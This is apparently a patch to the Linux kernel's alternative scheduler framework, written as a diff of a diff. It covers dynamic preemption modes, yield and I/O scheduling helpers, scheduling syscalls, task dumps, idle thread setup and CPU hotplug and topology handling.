-+int sched_dynamic_mode(const char *str)
-+{
-+	if (!strcmp(str, "none"))
-+		return preempt_dynamic_none;
-+
-+	if (!strcmp(str, "voluntary"))
-+		return preempt_dynamic_voluntary;
-+
-+	if (!strcmp(str, "full"))
-+		return preempt_dynamic_full;
-+
-+	return -EINVAL;
-+}
-+
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#define preempt_dynamic_enable(f)	static_call_update(f, f##_dynamic_enabled)
-+#define preempt_dynamic_disable(f)	static_call_update(f, f##_dynamic_disabled)
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+#define preempt_dynamic_enable(f)	static_key_enable(&sk_dynamic_##f.key)
-+#define preempt_dynamic_disable(f)	static_key_disable(&sk_dynamic_##f.key)
-+#else
-+#error "Unsupported PREEMPT_DYNAMIC mechanism"
-+#endif
-+
-+void sched_dynamic_update(int mode)
-+{
-+	/*
-+	 * Avoid {NONE,VOLUNTARY} -> FULL transitions from ever ending up in
-+	 * the ZERO state, which is invalid.
-+	 */
-+	preempt_dynamic_enable(cond_resched);
-+	preempt_dynamic_enable(might_resched);
-+	preempt_dynamic_enable(preempt_schedule);
-+	preempt_dynamic_enable(preempt_schedule_notrace);
-+	preempt_dynamic_enable(irqentry_exit_cond_resched);
-+
-+	switch (mode) {
-+	case preempt_dynamic_none:
-+		preempt_dynamic_enable(cond_resched);
-+		preempt_dynamic_disable(might_resched);
-+		preempt_dynamic_disable(preempt_schedule);
-+		preempt_dynamic_disable(preempt_schedule_notrace);
-+		preempt_dynamic_disable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: none\n");
-+		break;
-+
-+	case preempt_dynamic_voluntary:
-+		preempt_dynamic_enable(cond_resched);
-+		preempt_dynamic_enable(might_resched);
-+		preempt_dynamic_disable(preempt_schedule);
-+		preempt_dynamic_disable(preempt_schedule_notrace);
-+		preempt_dynamic_disable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: voluntary\n");
-+		break;
-+
-+	case preempt_dynamic_full:
-+		preempt_dynamic_disable(cond_resched);
-+		preempt_dynamic_disable(might_resched);
-+		preempt_dynamic_enable(preempt_schedule);
-+		preempt_dynamic_enable(preempt_schedule_notrace);
-+		preempt_dynamic_enable(irqentry_exit_cond_resched);
-+		pr_info("Dynamic Preempt: full\n");
-+		break;
-+	}
-+
-+	preempt_dynamic_mode = mode;
-+}
-+
-+static int __init setup_preempt_mode(char *str)
-+{
-+	int mode = sched_dynamic_mode(str);
-+	if (mode < 0) {
-+		pr_warn("Dynamic Preempt: unsupported mode: %s\n", str);
-+		return 0;
-+	}
-+
-+	sched_dynamic_update(mode);
-+	return 1;
-+}
-+__setup("preempt=", setup_preempt_mode);
-+
-+static void __init preempt_dynamic_init(void)
-+{
-+	if (preempt_dynamic_mode == preempt_dynamic_undefined) {
-+		if (IS_ENABLED(CONFIG_PREEMPT_NONE)) {
-+			sched_dynamic_update(preempt_dynamic_none);
-+		} else if (IS_ENABLED(CONFIG_PREEMPT_VOLUNTARY)) {
-+			sched_dynamic_update(preempt_dynamic_voluntary);
-+		} else {
-+			/* Default static call setting, nothing to do */
-+			WARN_ON_ONCE(!IS_ENABLED(CONFIG_PREEMPT));
-+			preempt_dynamic_mode = preempt_dynamic_full;
-+			pr_info("Dynamic Preempt: full\n");
-+		}
-+	}
-+}
-+
-+#define PREEMPT_MODEL_ACCESSOR(mode) \
-+	bool preempt_model_##mode(void)						 \
-+	{									 \
-+		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined); \
-+		return preempt_dynamic_mode == preempt_dynamic_##mode;		 \
-+	}									 \
-+	EXPORT_SYMBOL_GPL(preempt_model_##mode)
-+
-+PREEMPT_MODEL_ACCESSOR(none);
-+PREEMPT_MODEL_ACCESSOR(voluntary);
-+PREEMPT_MODEL_ACCESSOR(full);
-+
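-+/*
-+ * For reference, PREEMPT_MODEL_ACCESSOR(none) above expands to:
-+ *
-+ *	bool preempt_model_none(void)
-+ *	{
-+ *		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined);
-+ *		return preempt_dynamic_mode == preempt_dynamic_none;
-+ *	}
-+ *	EXPORT_SYMBOL_GPL(preempt_model_none);
-+ */
-+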
-+#else /* !CONFIG_PREEMPT_DYNAMIC */
-+
-+static inline void preempt_dynamic_init(void) { }
-+
-+#endif /* #ifdef CONFIG_PREEMPT_DYNAMIC */
-+
-+/**
-+ * yield - yield the current processor to other threads.
-+ *
-+ * Do not ever use this function, there's a 99% chance you're doing it wrong.
-+ *
-+ * The scheduler is at all times free to pick the calling task as the most
-+ * eligible task to run, if removing the yield() call from your code breaks
-+ * it, it's already broken.
-+ *
-+ * Typical broken usage is:
-+ *
-+ * while (!event)
-+ * 	yield();
-+ *
-+ * where one assumes that yield() will let 'the other' process run that will
-+ * make event true. If the current task is a SCHED_FIFO task that will never
-+ * happen. Never use yield() as a progress guarantee!!
-+ *
-+ * If you want to use yield() to wait for something, use wait_event().
-+ * If you want to use yield() to be 'nice' for others, use cond_resched().
-+ * If you still want to use yield(), do not!
-+ */
-+void __sched yield(void)
-+{
-+	set_current_state(TASK_RUNNING);
-+	do_sched_yield();
-+}
-+EXPORT_SYMBOL(yield);
-+
-+/**
-+ * yield_to - yield the current processor to another thread in
-+ * your thread group, or accelerate that thread toward the
-+ * processor it's on.
-+ * @p: target task
-+ * @preempt: whether task preemption is allowed or not
-+ *
-+ * It's the caller's job to ensure that the target task struct
-+ * can't go away on us before we can do any checks.
-+ *
-+ * In Alt schedule FW, yield_to is not supported.
-+ *
-+ * Return:
-+ *	true (>0) if we indeed boosted the target task.
-+ *	false (0) if we failed to boost the target.
-+ *	-ESRCH if there's no task to yield to.
-+ */
-+int __sched yield_to(struct task_struct *p, bool preempt)
-+{
-+	return 0;
-+}
-+EXPORT_SYMBOL_GPL(yield_to);
-+
-+int io_schedule_prepare(void)
-+{
-+	int old_iowait = current->in_iowait;
-+
-+	current->in_iowait = 1;
-+	blk_flush_plug(current->plug, true);
-+	return old_iowait;
-+}
-+
-+void io_schedule_finish(int token)
-+{
-+	current->in_iowait = token;
-+}
-+
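-+/*
-+ * Illustrative pairing of the two helpers above: a caller that blocks for
-+ * I/O with its own sleeping primitive brackets the sleep so that iowait
-+ * accounting nests correctly, roughly:
-+ *
-+ *	int tok = io_schedule_prepare();
-+ *	...sleep waiting for the I/O completion...
-+ *	io_schedule_finish(tok);
-+ */
-+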
-+/*
-+ * This task is about to go to sleep on IO.  Increment rq->nr_iowait so
-+ * that process accounting knows that this is a task in IO wait state.
-+ *
-+ * But don't do that if it is a deliberate, throttling IO wait (this task
-+ * has set its backing_dev_info: the queue against which it should throttle)
-+ */
-+
-+long __sched io_schedule_timeout(long timeout)
-+{
-+	int token;
-+	long ret;
-+
-+	token = io_schedule_prepare();
-+	ret = schedule_timeout(timeout);
-+	io_schedule_finish(token);
-+
-+	return ret;
-+}
-+EXPORT_SYMBOL(io_schedule_timeout);
-+
-+void __sched io_schedule(void)
-+{
-+	int token;
-+
-+	token = io_schedule_prepare();
-+	schedule();
-+	io_schedule_finish(token);
-+}
-+EXPORT_SYMBOL(io_schedule);
-+
-+/**
-+ * sys_sched_get_priority_max - return maximum RT priority.
-+ * @policy: scheduling class.
-+ *
-+ * Return: On success, this syscall returns the maximum
-+ * rt_priority that can be used by a given scheduling class.
-+ * On failure, a negative error code is returned.
-+ */
-+SYSCALL_DEFINE1(sched_get_priority_max, int, policy)
-+{
-+	int ret = -EINVAL;
-+
-+	switch (policy) {
-+	case SCHED_FIFO:
-+	case SCHED_RR:
-+		ret = MAX_RT_PRIO - 1;
-+		break;
-+	case SCHED_NORMAL:
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		ret = 0;
-+		break;
-+	}
-+	return ret;
-+}
-+
-+/**
-+ * sys_sched_get_priority_min - return minimum RT priority.
-+ * @policy: scheduling class.
-+ *
-+ * Return: On success, this syscall returns the minimum
-+ * rt_priority that can be used by a given scheduling class.
-+ * On failure, a negative error code is returned.
-+ */
-+SYSCALL_DEFINE1(sched_get_priority_min, int, policy)
-+{
-+	int ret = -EINVAL;
-+
-+	switch (policy) {
-+	case SCHED_FIFO:
-+	case SCHED_RR:
-+		ret = 1;
-+		break;
-+	case SCHED_NORMAL:
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		ret = 0;
-+		break;
-+	}
-+	return ret;
-+}
-+
-+static int sched_rr_get_interval(pid_t pid, struct timespec64 *t)
-+{
-+	struct task_struct *p;
-+	int retval;
-+
-+	alt_sched_debug();
-+
-+	if (pid < 0)
-+		return -EINVAL;
-+
-+	retval = -ESRCH;
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+	rcu_read_unlock();
-+
-+	*t = ns_to_timespec64(sched_timeslice_ns);
-+	return 0;
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_rr_get_interval - return the default timeslice of a process.
-+ * @pid: pid of the process.
-+ * @interval: userspace pointer to the timeslice value.
-+ *
-+ * Return: On success, 0 and the timeslice is in @interval. Otherwise,
-+ * an error code.
-+ */
-+SYSCALL_DEFINE2(sched_rr_get_interval, pid_t, pid,
-+		struct __kernel_timespec __user *, interval)
-+{
-+	struct timespec64 t;
-+	int retval = sched_rr_get_interval(pid, &t);
-+
-+	if (retval == 0)
-+		retval = put_timespec64(&t, interval);
-+
-+	return retval;
-+}
-+
-+#ifdef CONFIG_COMPAT_32BIT_TIME
-+SYSCALL_DEFINE2(sched_rr_get_interval_time32, pid_t, pid,
-+		struct old_timespec32 __user *, interval)
-+{
-+	struct timespec64 t;
-+	int retval = sched_rr_get_interval(pid, &t);
-+
-+	if (retval == 0)
-+		retval = put_old_timespec32(&t, interval);
-+	return retval;
-+}
-+#endif
-+
-+void sched_show_task(struct task_struct *p)
-+{
-+	unsigned long free = 0;
-+	int ppid;
-+
-+	if (!try_get_task_stack(p))
-+		return;
-+
-+	pr_info("task:%-15.15s state:%c", p->comm, task_state_to_char(p));
-+
-+	if (task_is_running(p))
-+		pr_cont("  running task    ");
-+#ifdef CONFIG_DEBUG_STACK_USAGE
-+	free = stack_not_used(p);
-+#endif
-+	ppid = 0;
-+	rcu_read_lock();
-+	if (pid_alive(p))
-+		ppid = task_pid_nr(rcu_dereference(p->real_parent));
-+	rcu_read_unlock();
-+	pr_cont(" stack:%-5lu pid:%-5d ppid:%-6d flags:0x%08lx\n",
-+		free, task_pid_nr(p), ppid,
-+		read_task_thread_flags(p));
-+
-+	print_worker_info(KERN_INFO, p);
-+	print_stop_info(KERN_INFO, p);
-+	show_stack(p, NULL, KERN_INFO);
-+	put_task_stack(p);
-+}
-+EXPORT_SYMBOL_GPL(sched_show_task);
-+
-+static inline bool
-+state_filter_match(unsigned long state_filter, struct task_struct *p)
-+{
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/* no filter, everything matches */
-+	if (!state_filter)
-+		return true;
-+
-+	/* filter, but doesn't match */
-+	if (!(state & state_filter))
-+		return false;
-+
-+	/*
-+	 * When looking for TASK_UNINTERRUPTIBLE skip TASK_IDLE (allows
-+	 * TASK_KILLABLE).
-+	 */
-+	if (state_filter == TASK_UNINTERRUPTIBLE && (state & TASK_NOLOAD))
-+		return false;
-+
-+	return true;
-+}
-+
-+void show_state_filter(unsigned int state_filter)
-+{
-+	struct task_struct *g, *p;
-+
-+	rcu_read_lock();
-+	for_each_process_thread(g, p) {
-+		/*
-+		 * reset the NMI-timeout, listing all files on a slow
-+		 * console might take a lot of time:
-+		 * Also, reset softlockup watchdogs on all CPUs, because
-+		 * another CPU might be blocked waiting for us to process
-+		 * an IPI.
-+		 */
-+		touch_nmi_watchdog();
-+		touch_all_softlockup_watchdogs();
-+		if (state_filter_match(state_filter, p))
-+			sched_show_task(p);
-+	}
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+	/* TODO: Alt schedule FW should support this
-+	if (!state_filter)
-+		sysrq_sched_debug_show();
-+	*/
-+#endif
-+	rcu_read_unlock();
-+	/*
-+	 * Only show locks if all tasks are dumped:
-+	 */
-+	if (!state_filter)
-+		debug_show_all_locks();
-+}
-+
-+void dump_cpu_task(int cpu)
-+{
-+	if (cpu == smp_processor_id() && in_hardirq()) {
-+		struct pt_regs *regs;
-+
-+		regs = get_irq_regs();
-+		if (regs) {
-+			show_regs(regs);
-+			return;
-+		}
-+	}
-+
-+	if (trigger_single_cpu_backtrace(cpu))
-+		return;
-+
-+	pr_info("Task dump for CPU %d:\n", cpu);
-+	sched_show_task(cpu_curr(cpu));
-+}
-+
-+/**
-+ * init_idle - set up an idle thread for a given CPU
-+ * @idle: task in question
-+ * @cpu: CPU the idle task belongs to
-+ *
-+ * NOTE: this function does not set the idle thread's NEED_RESCHED
-+ * flag, to make booting more robust.
-+ */
-+void __init init_idle(struct task_struct *idle, int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	__sched_fork(0, idle);
-+
-+	raw_spin_lock_irqsave(&idle->pi_lock, flags);
-+	raw_spin_lock(&rq->lock);
-+
-+	idle->last_ran = rq->clock_task;
-+	idle->__state = TASK_RUNNING;
-+	/*
-+	 * PF_KTHREAD should already be set at this point; regardless, make it
-+	 * look like a proper per-CPU kthread.
-+	 */
-+	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
-+	kthread_set_per_cpu(idle, cpu);
-+
-+	sched_queue_init_idle(&rq->queue, idle);
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * It's possible that init_idle() gets called multiple times on a task,
-+	 * in that case do_set_cpus_allowed() will not do the right thing.
-+	 *
-+	 * And since this is boot we can forgo the serialisation.
-+	 */
-+	set_cpus_allowed_common(idle, cpumask_of(cpu));
-+#endif
-+
-+	/* Silence PROVE_RCU */
-+	rcu_read_lock();
-+	__set_task_cpu(idle, cpu);
-+	rcu_read_unlock();
-+
-+	rq->idle = idle;
-+	rcu_assign_pointer(rq->curr, idle);
-+	idle->on_cpu = 1;
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&idle->pi_lock, flags);
-+
-+	/* Set the preempt count _outside_ the spinlocks! */
-+	init_idle_preempt_count(idle, cpu);
-+
-+	ftrace_graph_init_idle_task(idle, cpu);
-+	vtime_init_idle(idle, cpu);
-+#ifdef CONFIG_SMP
-+	sprintf(idle->comm, "%s/%d", INIT_TASK_COMM, cpu);
-+#endif
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
-+			      const struct cpumask __maybe_unused *trial)
-+{
-+	return 1;
-+}
-+
-+int task_can_attach(struct task_struct *p,
-+		    const struct cpumask *cs_effective_cpus)
-+{
-+	int ret = 0;
-+
-+	/*
-+	 * Kthreads which disallow setaffinity shouldn't be moved
-+	 * to a new cpuset; we don't want to change their CPU
-+	 * affinity and isolating such threads by their set of
-+	 * allowed nodes is unnecessary.  Thus, cpusets are not
-+	 * applicable for such threads.  This prevents checking for
-+	 * success of set_cpus_allowed_ptr() on all attached tasks
-+	 * before cpus_mask may be changed.
-+	 */
-+	if (p->flags & PF_NO_SETAFFINITY)
-+		ret = -EINVAL;
-+
-+	return ret;
-+}
-+
-+bool sched_smp_initialized __read_mostly;
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+/*
-+ * Ensures that the idle task is using init_mm right before its CPU goes
-+ * offline.
-+ */
-+void idle_task_exit(void)
-+{
-+	struct mm_struct *mm = current->active_mm;
-+
-+	BUG_ON(current != this_rq()->idle);
-+
-+	if (mm != &init_mm) {
-+		switch_mm(mm, &init_mm, current);
-+		finish_arch_post_lock_switch();
-+	}
-+
-+	/* finish_cpu(), as run on the BP, will clean up the active_mm state */
-+}
-+
-+static int __balance_push_cpu_stop(void *arg)
-+{
-+	struct task_struct *p = arg;
-+	struct rq *rq = this_rq();
-+	struct rq_flags rf;
-+	int cpu;
-+
-+	raw_spin_lock_irq(&p->pi_lock);
-+	rq_lock(rq, &rf);
-+
-+	update_rq_clock(rq);
-+
-+	if (task_rq(p) == rq && task_on_rq_queued(p)) {
-+		cpu = select_fallback_rq(rq->cpu, p);
-+		rq = __migrate_task(rq, p, cpu);
-+	}
-+
-+	rq_unlock(rq, &rf);
-+	raw_spin_unlock_irq(&p->pi_lock);
-+
-+	put_task_struct(p);
-+
-+	return 0;
-+}
-+
-+static DEFINE_PER_CPU(struct cpu_stop_work, push_work);
-+
-+/*
-+ * This is enabled below SCHED_AP_ACTIVE, i.e. when !cpu_active(), but it
-+ * only takes effect while the CPU is going down.
-+ */
-+static void balance_push(struct rq *rq)
-+{
-+	struct task_struct *push_task = rq->curr;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*
-+	 * Ensure the thing is persistent until balance_push_set(.on = false);
-+	 */
-+	rq->balance_callback = &balance_push_callback;
-+
-+	/*
-+	 * Only active while going offline and when invoked on the outgoing
-+	 * CPU.
-+	 */
-+	if (!cpu_dying(rq->cpu) || rq != this_rq())
-+		return;
-+
-+	/*
-+	 * Both the cpu-hotplug and stop task are in this case and are
-+	 * required to complete the hotplug process.
-+	 */
-+	if (kthread_is_per_cpu(push_task) ||
-+	    is_migration_disabled(push_task)) {
-+
-+		/*
-+		 * If this is the idle task on the outgoing CPU try to wake
-+		 * up the hotplug control thread which might wait for the
-+		 * last task to vanish. The rcuwait_active() check is
-+		 * accurate here because the waiter is pinned on this CPU
-+		 * and can't obviously be running in parallel.
-+		 *
-+		 * On RT kernels this also has to check whether there are
-+		 * pinned and scheduled out tasks on the runqueue. They
-+		 * need to leave the migrate disabled section first.
-+		 */
-+		if (!rq->nr_running && !rq_has_pinned_tasks(rq) &&
-+		    rcuwait_active(&rq->hotplug_wait)) {
-+			raw_spin_unlock(&rq->lock);
-+			rcuwait_wake_up(&rq->hotplug_wait);
-+			raw_spin_lock(&rq->lock);
-+		}
-+		return;
-+	}
-+
-+	get_task_struct(push_task);
-+	/*
-+	 * Temporarily drop rq->lock such that we can wake-up the stop task.
-+	 * Both preemption and IRQs are still disabled.
-+	 */
-+	raw_spin_unlock(&rq->lock);
-+	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
-+			    this_cpu_ptr(&push_work));
-+	/*
-+	 * At this point need_resched() is true and we'll take the loop in
-+	 * schedule(). The next pick is obviously going to be the stop task,
-+	 * which is kthread_is_per_cpu(), and it will push this task away.
-+	 */
-+	raw_spin_lock(&rq->lock);
-+}
-+
-+static void balance_push_set(int cpu, bool on)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	struct rq_flags rf;
-+
-+	rq_lock_irqsave(rq, &rf);
-+	if (on) {
-+		WARN_ON_ONCE(rq->balance_callback);
-+		rq->balance_callback = &balance_push_callback;
-+	} else if (rq->balance_callback == &balance_push_callback) {
-+		rq->balance_callback = NULL;
-+	}
-+	rq_unlock_irqrestore(rq, &rf);
-+}
-+
-+/*
-+ * Invoked from a CPU's hotplug control thread after the CPU has been marked
-+ * inactive. All tasks which are not per CPU kernel threads are either
-+ * pushed off this CPU now via balance_push() or placed on a different CPU
-+ * during wakeup. Wait until the CPU is quiescent.
-+ */
-+static void balance_hotplug_wait(void)
-+{
-+	struct rq *rq = this_rq();
-+
-+	rcuwait_wait_event(&rq->hotplug_wait,
-+			   rq->nr_running == 1 && !rq_has_pinned_tasks(rq),
-+			   TASK_UNINTERRUPTIBLE);
-+}
-+
-+#else
-+
-+static void balance_push(struct rq *rq)
-+{
-+}
-+
-+static void balance_push_set(int cpu, bool on)
-+{
-+}
-+
-+static inline void balance_hotplug_wait(void)
-+{
-+}
-+#endif /* CONFIG_HOTPLUG_CPU */
-+
-+static void set_rq_offline(struct rq *rq)
-+{
-+	if (rq->online)
-+		rq->online = false;
-+}
-+
-+static void set_rq_online(struct rq *rq)
-+{
-+	if (!rq->online)
-+		rq->online = true;
-+}
-+
-+/*
-+ * used to mark begin/end of suspend/resume:
-+ */
-+static int num_cpus_frozen;
-+
-+/*
-+ * Update cpusets according to cpu_active mask.  If cpusets are
-+ * disabled, cpuset_update_active_cpus() becomes a simple wrapper
-+ * around partition_sched_domains().
-+ *
-+ * If we come here as part of a suspend/resume, don't touch cpusets because we
-+ * want to restore it back to its original state upon resume anyway.
-+ */
-+static void cpuset_cpu_active(void)
-+{
-+	if (cpuhp_tasks_frozen) {
-+		/*
-+		 * num_cpus_frozen tracks how many CPUs are involved in suspend
-+		 * resume sequence. As long as this is not the last online
-+		 * operation in the resume sequence, just build a single sched
-+		 * domain, ignoring cpusets.
-+		 */
-+		partition_sched_domains(1, NULL, NULL);
-+		if (--num_cpus_frozen)
-+			return;
-+		/*
-+		 * This is the last CPU online operation. So fall through and
-+		 * restore the original sched domains by considering the
-+		 * cpuset configurations.
-+		 */
-+		cpuset_force_rebuild();
-+	}
-+
-+	cpuset_update_active_cpus();
-+}
-+
-+static int cpuset_cpu_inactive(unsigned int cpu)
-+{
-+	if (!cpuhp_tasks_frozen) {
-+		cpuset_update_active_cpus();
-+	} else {
-+		num_cpus_frozen++;
-+		partition_sched_domains(1, NULL, NULL);
-+	}
-+	return 0;
-+}
-+
-+int sched_cpu_activate(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	/*
-+	 * Clear the balance_push callback and prepare to schedule
-+	 * regular tasks.
-+	 */
-+	balance_push_set(cpu, false);
-+
-+#ifdef CONFIG_SCHED_SMT
-+	/*
-+	 * When going up, increment the number of cores with SMT present.
-+	 */
-+	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
-+		static_branch_inc_cpuslocked(&sched_smt_present);
-+#endif
-+	set_cpu_active(cpu, true);
-+
-+	if (sched_smp_initialized)
-+		cpuset_cpu_active();
-+
-+	/*
-+	 * Put the rq online, if not already. This happens:
-+	 *
-+	 * 1) In the early boot process, because we build the real domains
-+	 *    after all cpus have been brought up.
-+	 *
-+	 * 2) At runtime, if cpuset_cpu_active() fails to rebuild the
-+	 *    domains.
-+	 */
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	set_rq_online(rq);
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	return 0;
-+}
-+
-+int sched_cpu_deactivate(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+	int ret;
-+
-+	set_cpu_active(cpu, false);
-+
-+	/*
-+	 * From this point forward, this CPU will refuse to run any task that
-+	 * is not: migrate_disable() or KTHREAD_IS_PER_CPU, and will actively
-+	 * push those tasks away until this gets cleared, see
-+	 * sched_cpu_dying().
-+	 */
-+	balance_push_set(cpu, true);
-+
-+	/*
-+	 * We've cleared cpu_active_mask, wait for all preempt-disabled and RCU
-+	 * users of this state to go away such that all new such users will
-+	 * observe it.
-+	 *
-+	 * Specifically, we rely on ttwu to no longer target this CPU, see
-+	 * ttwu_queue_cond() and is_cpu_allowed().
-+	 *
-+	 * Do the sync before parking smpboot threads to handle the RCU boost case.
-+	 */
-+	synchronize_rcu();
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	update_rq_clock(rq);
-+	set_rq_offline(rq);
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+#ifdef CONFIG_SCHED_SMT
-+	/*
-+	 * When going down, decrement the number of cores with SMT present.
-+	 */
-+	if (cpumask_weight(cpu_smt_mask(cpu)) == 2) {
-+		static_branch_dec_cpuslocked(&sched_smt_present);
-+		if (!static_branch_likely(&sched_smt_present))
-+			cpumask_clear(&sched_sg_idle_mask);
-+	}
-+#endif
-+
-+	if (!sched_smp_initialized)
-+		return 0;
-+
-+	ret = cpuset_cpu_inactive(cpu);
-+	if (ret) {
-+		balance_push_set(cpu, false);
-+		set_cpu_active(cpu, true);
-+		return ret;
-+	}
-+
-+	return 0;
-+}
-+
-+static void sched_rq_cpu_starting(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	rq->calc_load_update = calc_load_update;
-+}
-+
-+int sched_cpu_starting(unsigned int cpu)
-+{
-+	sched_rq_cpu_starting(cpu);
-+	sched_tick_start(cpu);
-+	return 0;
-+}
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+
-+/*
-+ * Invoked immediately before the stopper thread is invoked to bring the
-+ * CPU down completely. At this point all per CPU kthreads except the
-+ * hotplug thread (current) and the stopper thread (inactive) have been
-+ * either parked or have been unbound from the outgoing CPU. Ensure that
-+ * any of those which might be on the way out are gone.
-+ *
-+ * If after this point a bound task is being woken on this CPU then the
-+ * responsible hotplug callback has failed to do its job.
-+ * sched_cpu_dying() will catch it with the appropriate fireworks.
-+ */
-+int sched_cpu_wait_empty(unsigned int cpu)
-+{
-+	balance_hotplug_wait();
-+	return 0;
-+}
-+
-+/*
-+ * Since this CPU is going 'away' for a while, fold any nr_active delta we
-+ * might have. Called from the CPU stopper task after ensuring that the
-+ * stopper is the last running task on the CPU, so nr_active count is
-+ * stable. We need to take the teardown thread which is calling this into
-+ * account, so we hand in adjust = 1 to the load calculation.
-+ *
-+ * Also see the comment "Global load-average calculations".
-+ */
-+static void calc_load_migrate(struct rq *rq)
-+{
-+	long delta = calc_load_fold_active(rq, 1);
-+
-+	if (delta)
-+		atomic_long_add(delta, &calc_load_tasks);
-+}
-+
-+static void dump_rq_tasks(struct rq *rq, const char *loglvl)
-+{
-+	struct task_struct *g, *p;
-+	int cpu = cpu_of(rq);
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	printk("%sCPU%d enqueued tasks (%u total):\n", loglvl, cpu, rq->nr_running);
-+	for_each_process_thread(g, p) {
-+		if (task_cpu(p) != cpu)
-+			continue;
-+
-+		if (!task_on_rq_queued(p))
-+			continue;
-+
-+		printk("%s\tpid: %d, name: %s\n", loglvl, p->pid, p->comm);
-+	}
-+}
-+
-+int sched_cpu_dying(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	/* Handle pending wakeups and then migrate everything off */
-+	sched_tick_stop(cpu);
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (rq->nr_running != 1 || rq_has_pinned_tasks(rq)) {
-+		WARN(true, "Dying CPU not properly vacated!");
-+		dump_rq_tasks(rq, KERN_WARNING);
-+	}
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	calc_load_migrate(rq);
-+	hrtick_clear(rq);
-+	return 0;
-+}
-+#endif
-+
-+#ifdef CONFIG_SMP
-+static void sched_init_topology_cpumask_early(void)
-+{
-+	int cpu;
-+	cpumask_t *tmp;
-+
-+	for_each_possible_cpu(cpu) {
-+		/* init topo masks */
-+		tmp = per_cpu(sched_cpu_topo_masks, cpu);
-+
-+		cpumask_copy(tmp, cpumask_of(cpu));
-+		tmp++;
-+		cpumask_copy(tmp, cpu_possible_mask);
-+		per_cpu(sched_cpu_llc_mask, cpu) = tmp;
-+		per_cpu(sched_cpu_topo_end_mask, cpu) = ++tmp;
-+		/*per_cpu(sd_llc_id, cpu) = cpu;*/
-+	}
-+}
-+
-+#define TOPOLOGY_CPUMASK(name, mask, last)\
-+	if (cpumask_and(topo, topo, mask)) {					\
-+		cpumask_copy(topo, mask);					\
-+		printk(KERN_INFO "sched: cpu#%02d topo: 0x%08lx - "#name,	\
-+		       cpu, (topo++)->bits[0]);					\
-+	}									\
-+	if (!last)								\
-+		cpumask_complement(topo, mask)
-+
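-+/*
-+ * How one TOPOLOGY_CPUMASK() instantiation below works: if the current
-+ * candidate mask intersects the given topology mask, the topology mask is
-+ * recorded (and logged) as this CPU's next affinity level; the following
-+ * level's candidate mask is then seeded with the complement of the given
-+ * mask, so each wider level only covers CPUs not already matched.  The
-+ * "last" argument skips that reseeding for the final level.
-+ */
-+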
-+static void sched_init_topology_cpumask(void)
-+{
-+	int cpu;
-+	cpumask_t *topo;
-+
-+	for_each_online_cpu(cpu) {
-+		/* take the chance to reset the time slice for idle tasks */
-+		cpu_rq(cpu)->idle->time_slice = sched_timeslice_ns;
-+
-+		topo = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+
-+		cpumask_complement(topo, cpumask_of(cpu));
-+#ifdef CONFIG_SCHED_SMT
-+		TOPOLOGY_CPUMASK(smt, topology_sibling_cpumask(cpu), false);
-+#endif
-+		per_cpu(sd_llc_id, cpu) = cpumask_first(cpu_coregroup_mask(cpu));
-+		per_cpu(sched_cpu_llc_mask, cpu) = topo;
-+		TOPOLOGY_CPUMASK(coregroup, cpu_coregroup_mask(cpu), false);
-+
-+		TOPOLOGY_CPUMASK(core, topology_core_cpumask(cpu), false);
-+
-+		TOPOLOGY_CPUMASK(others, cpu_online_mask, true);
-+
-+		per_cpu(sched_cpu_topo_end_mask, cpu) = topo;
-+		printk(KERN_INFO "sched: cpu#%02d llc_id = %d, llc_mask idx = %d\n",
-+		       cpu, per_cpu(sd_llc_id, cpu),
-+		       (int) (per_cpu(sched_cpu_llc_mask, cpu) -
-+			      per_cpu(sched_cpu_topo_masks, cpu)));
-+	}
-+}
-+#endif
-+
-+void __init sched_init_smp(void)
-+{
-+	/* Move init over to a non-isolated CPU */
-+	if (set_cpus_allowed_ptr(current, housekeeping_cpumask(HK_TYPE_DOMAIN)) < 0)
-+		BUG();
-+	current->flags &= ~PF_NO_SETAFFINITY;
-+
-+	sched_init_topology_cpumask();
-+
-+	sched_smp_initialized = true;
-+}
-+
-+static int __init migration_init(void)
-+{
-+	sched_cpu_starting(smp_processor_id());
-+	return 0;
-+}
